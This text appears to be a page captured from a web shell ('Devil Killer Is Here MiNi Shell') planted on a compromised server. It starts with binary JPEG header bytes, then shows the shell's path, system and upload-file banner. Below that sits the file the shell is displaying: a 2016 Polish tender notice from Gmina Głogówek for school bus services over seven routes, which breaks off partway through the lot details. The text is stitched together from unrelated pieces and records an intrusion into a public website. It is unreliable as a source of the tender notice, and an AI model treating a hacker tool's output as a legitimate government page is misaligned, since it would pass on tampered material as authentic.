JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160719/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160719/142343-N-2016.html

<p class="kh_header"><b>Głogówek: Dowóz dzieci szkolnych do placówek oświatowych na terenie miasta i gminy Głogówek w roku szkolnym 2016/2017</b><br>
<b>Numer ogłoszenia: 142343 - 2016; data zamieszczenia: 19.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Głogówek , ul. Rynek 1, 48-250 Głogówek, woj. opolskie, tel. 77 4069900, 4069915, faks 77 4069906.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogowek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz dzieci szkolnych do placówek oświatowych na terenie miasta i gminy Głogówek w roku szkolnym 2016/2017.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje usługi związane z dowozem dzieci pięcioletnich i sześcioletnich do przedszkola, uczniów szkół podstawowych i gimnazjalnych do niżej podanych placówek oświatowych na terenie miasta i gminy Głogówek wraz z odwiezieniem tych dzieci do miejsca zamieszkania:
- Szkoła Podstawowa Nr 1 w Głogówku
- Szkoła Podstawowa Nr 2 w Głogówku
- Publiczne Gimnazjum Nr 1 w Głogówku
- Ośrodek Szkolno- Wychowawczy w Głogówku
- Szkoła Podstawowa w Biedrzychowicach
- Szkoła Podstawowa w Szonowie
- Oddział przedszkolny w Szonowie
- Oddział przedszkolny w Biedrzychowicach
- Oddział przedszkolny na Oraczach
- Zespół Szkół w Racławicach Śląskich
Zakres zamówienia:
usługi przewozowe - dowozy uczniów do placówek oświatowych w gminie Głogówek w roku szkolnym 2016/2017 w dni z wyjątkiem sobót, świąt i innych dni ustawowo wolnych od pracy, także przerw  w realizacji zajęć dydaktyczno -wychowawczych, określonych na podstawie  przepisów rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego - Dz. U z 2002 r., Nr 46, poz.432 z późniejszymi zmianami.
W przypadku zmiany organizacji zajęć polegającej na:
a/skróceniu godzin nauki, egzaminu gimnazjalnego
b/odpracowaniu zajęć z dnia wypadającego pomiędzy dwoma dniami świątecznymi ustawowo wolnymi od pracy lub piątku wypadającego bezpośrednio po dniu świątecznym ustawowo wolnym od pracy w sobotę lub innych przyczyn
Wykonawca zostaje powiadomiony przez szkołę  o zmianie terminu dowozu lub odwozu uczniów. 
Usługi będą świadczone autobusami przystosowanymi do przewozu dzieci szkolnych spełniającymi wszystkie wymagania bezpieczeństwa, higieny i kodeksu drogowego, przez osoby mające odpowiednie uprawnienia do świadczenia tych usług. Wykonawca zamówienia musi zapewnić odpowiednią liczbę miejsc w autobusie - odpowiednio dla danej trasy. W przypadku awarii autobusu Wykonawca jest zobowiązany do zapewnienia zastępczego autobusu o odpowiedniej liczbie miejsc, w taki sposób aby nie powodował opóźnień czasowych kursu. 
Wykonawca usługi zobowiązany jest do zawarcia umowy ubezpieczeniowej od odpowiedzialności cywilnej oraz następstw nieszczęśliwych wypadków w związku z wykonywaniem przedmiotu umowy.
Dowóz uczniów do szkół podstawowych i gimnazjalnych będzie się odbywał na podstawie harmonogramu, który będzie stanowił załącznik do umowy, określony od 01.09.2016 r 
Ustalona długość tras podana w podziale na każde zadanie określona (w załączniku nr 6) zawiera ilość kilometrów planowanego dowozu i odwozu  uczniów wykonanego jednym autobusem. Liczba kilometrów może ulec zmianie po zmianie  harmonogramu dowozu
Podstawą  dla Zamawiającego do regulowania należności są wykonane usługi dla danej trasy, będzie to ilość kilometrów  wykonanych ustalona przez Zamawiającego i podana w harmonogramie, jeżeli kurs przebiegał zgodnie z harmonogramem. Jeżeli kurs wykonany był krótszy, to za ilość wykonanych kilometrów
Wszystkie dzieci, które rozpoczynają zajęcia lekcyjne muszą być przywiezione do poszczególnych szkół na 5 minut przed rozpoczęciem zajęć lekcyjnych.
Odwożenie dzieci do miejsca zamieszkania będzie odbywało się w godzinach   ustalonych w harmonogramie. Harmonogram ten może ulec zmianie po zatwierdzeniu przez dyrektorów szkół  rozkładu zajęć na rok 2016/2017 i przekazaniu Wykonawcy.
Zamawiający zastrzega sobie możliwość wprowadzenia zmian  w harmonogramie dowozu i odwozu. Z chwilą ustalenia rozkładu zajęć lekcyjnych Zamawiający i Wykonawca ustalą obowiązujący harmonogram dowozu i odwozu. Powyższe zostanie uregulowane poprzez podpisanie stosownego aneksu wraz z harmonogramem, który będzie podstawą do następnych rozliczeń.
Usługi dowozu dzieci będą świadczone według załączonego wykazu tras z terenu gminy Głogówek do wymienionych szkół zgodnie z (załącznikiem nr 6) oraz zgodnie  z ustalonym i zatwierdzonym harmonogramem czasowym.
Wykaz kursów, miejscowości, ilość dzieci do odwiezienia po lekcjach, może ulec
    zmianie  w zależności od zatwierdzonego rozkładu zajęć lekcyjnych w szkołach.
Wykonawca przy realizacji usług zobowiązany będzie do :
Stosowania autobusów do przewozu dzieci szkolnych oraz jego oznakowanie zgodnie z obowiązującymi w tym zakresie przepisami;
Ponoszenia kosztów szkód wynikłych w czasie wykonywania usług jak również do odpowiedzialności za wszelkie zdarzenia powstałe z tej przyczyny.
2. Zamawiający dopuszcza możliwość składania ofert częściowych (7 części) na poszczególne zadania:
Zadanie Nr 1- realizowane autobusem na 45 miejsc siedzących
Trasa : Głogówek-  Stare Kotkowice-Biedrzychowice SP/OP- Twardawa-
             Zwiastowice- Biedrzychowice SP- Głogówek GNr 1
Zadanie Nr 2- realizowane autobusem na 30 miejsc siedzących
Trasa : Głogówek- Wróblin- Stare Kotkowice- Głogówek GNr 1
 Głogówek- Nowe Kotkowice- Chudoba- Głogówek -SP Nr 1/G Nr 1
Zadanie Nr 3- realizowane autobusem na 42 miejsca siedzące
Trasa: Głogówek-Wierzch- Mionów- Błażejowice- Mochów- Głogówek GNr1
Głogówek - Błażejowice - Mionów- Wierzch- Mochów skrzyżowanie - Głogówek SPNr1
Zadanie Nr 4- realizowane autobusem na 42 miejsc siedzących
Trasa:   Głogówek- Zawada But- Sysłów- Golczowice- Mucków- Zawada- Leśnik -
- Głogówek GNr1/SPNr1 
Zadanie Nr 5- realizowane autobusem na 42 miejsc siedzących
Trasa: Głogówek- Kierpień- Rzepcze - Głogówek SPNr1/GNr1 
Zadanie Nr 6- realizowane autobusem na 53 miejsc siedzących
Trasa: Głogówek- Racławice Śl- Dzierżysławice- Mochów -GłogówekGNr1/SPNr1-	 Głogówek SPNr2- Głogowiec- Głogówek OP Oracze- Głogówek SPNr2  -GNr1
Zadanie Nr 7- realizowane autobusem na 42 miejsc siedzących
Trasa: Głogówek- Cieszniów- Kazimierz- Góreczno - Tomice- Szonów SP- Klisino -  Racławice Śl. ZSz - Racławice Śl -  Kazimierz- Góreczno- Tomice -  Szonów SP/OP - Głogówek. Szczegółowe opisy wszystkich części zawarte są w SIWZ oraz załącznikach nr 6 i 7 do SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, ze Wykonawca spełnił warunek, jeżeli posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie świadczenia usługi związanej z przewozem osób. Warunek zostanie uznany za spełniony, jeżeli Wykonawca udokumentuje świadczenie usług przewozu osób w ilości co najmniej 1 zamówienia o wielkości odpowiadającej jednej części zadania, na którą składa ofertę. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszę wykazać posiadanie odpowiedniej liczby autobusów, które pozwalają bez jakichkolwiek przeszkód na realizację zamówienia wg ustalonych w harmonogramie tras i ilości dzieci do przewozu  dla poszczególnych części, poprzez załącznik nr 5 do SIWZ. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać posiadanie odpowiedniej ilości pracowników na stanowisku kierowców z uprawnieniami do kierowania autobusami, poprzez załącznik nr 5 do SIWZ.  Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać, że są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż  50.000,00 zł. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wzór oferty - wg wzoru stanowiącego załącznik nr 1 do SIWZ,
2) pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest powołany,
3) pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania wykonawców w postępowaniu lub do reprezentowania w postępowaniu i podpisania umowy,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Rok produkcji pojazdu - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadkach: a) gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT); b) wynagrodzenia w przypadku konieczności zmiany terminu realizacji w związku z  brakiem możliwości prowadzenia usług na skutek obiektywnych warunków klimatycznych lub działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego (działań wojennych aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych, z wyjątkiem tych, które mogą być spowodowane użyciem ich przez wykonawcę, zaistnienie klęski żywiołowej, jak huragany, powodzie, trzęsienie ziemi, bunty, niepokoje, strajki).
2. Zmiany lub rezygnacji z podwykonawcy lub wprowadzenia nowego podwykonawcy w zakresie nieprzewidzianym w formularzu oferty - może nastąpić za pisemną zgodą Zamawiającego, gdy Wykonawca wystąpi z takim wnioskiem do Zamawiającego; w przypadku gdy dotychczasowy podwykonawca swoimi zasobami potwierdzał spełnienie przez Wykonawcę opisanych warunków udziału w postępowaniu, nowy podwykonawca musi spełnić warunki udziału w postępowaniu w takim samym zakresie jak dotychczasowy podwykonawca.
3. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.glogowek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Głogówku, ul. Rynek 1, 48-250 Głogówek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2016 godzina 10:00, miejsce: Urząd Miejski w Głogówku, ul. Rynek 1, 48-250 Głogówek, I piętro, pokój nr 13-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawierania umowy ramowej oraz nie przewiduje ustanowienia dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 realizowane autobusem na  45  miejsc siedzących Trasa  Głogówek - Stare Kotkowice- Biedrzychowice SP/OP - Twardawa - Zwiastowice - 
- Biedrzychowice SP -Głogówek GNr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie realizowane autobusem na  45  miejsc siedzących
Trasa  - kurs ranny - 24 km 
Głogówek - Stare Kotkowice - Biedrzychowice SP/OP - Twardawa - Zwiastowice - Biedrzychowice SP - Głogówek GNr1
liczba uczniów : do SP Biedrzychowice- 26 uczniów
		   do G Nr 1 - 39 uczniów
		   do Ośrodka Szk - Wych - 2 uczniów
		   do OP Biedrzychowice - 3 dzieci
Trasa  - kurs popołudniowy- 42 km  
I -Głogówek GNr1- Stare Kotkowice- BiedrzychowiceSP- Zwiastowice- Głogówek		18 km
